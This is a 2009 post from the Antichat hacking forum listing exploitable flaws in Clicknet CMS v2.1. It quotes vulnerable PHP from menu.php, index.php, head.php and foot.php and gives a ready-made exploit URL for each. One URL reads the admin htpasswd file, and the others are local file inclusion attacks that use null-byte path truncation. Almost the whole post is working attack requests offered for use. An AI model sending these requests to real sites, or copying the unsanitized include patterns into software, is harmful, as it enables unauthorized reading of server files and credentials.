03.11.2009, 18:22
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
Clicknet_CMS_v2.1
Чтение файлов
MQ=off
register_globals= on
Файл menu.php
PHP код:
<?php
$menufil = $_SERVER["DOCUMENT_ROOT"] . $lokal . "menus/$indhold[2].php";
$menuitems = file($menufil);
http://localhost/Clicknet_CMS_v2.1/plugins/menu.php?lokal=/путь/до/файла/admin/htpasswd
LFI
Файл index.php
MQ=off
register_globals= on
PHP код:
...
$lokal = $content;
} else {
$lokal = "/";
}
...
include($_SERVER["DOCUMENT_ROOT"] . $lokal . "count.php");
http://localhost/Clicknet_CMS_v2.1/index.php?content=/путь/до/файла%00
Файл head.php
PHP код:
if ($indhold[2])
{ echo "<td width=\"150\" valign=\"top\">\n"; include($_SERVER["DOCUMENT_ROOT"] . $lokal . "plugins/menu.php");
echo "</td>\n";
http://localhost/Clicknet_CMS_v2.1/head.php?indhold[2]=1&lokal=/путь/до/файла%00
Файл foot.php
PHP код:
include($_SERVER . $lokal . "sys/fodnote.php");
http://localhost/Clicknet_CMS_v2.1/foot.php?lokal=/путь/до/файла%00
Последний раз редактировалось HAXTA4OK; 03.11.2009 в 18:30..
|
|
|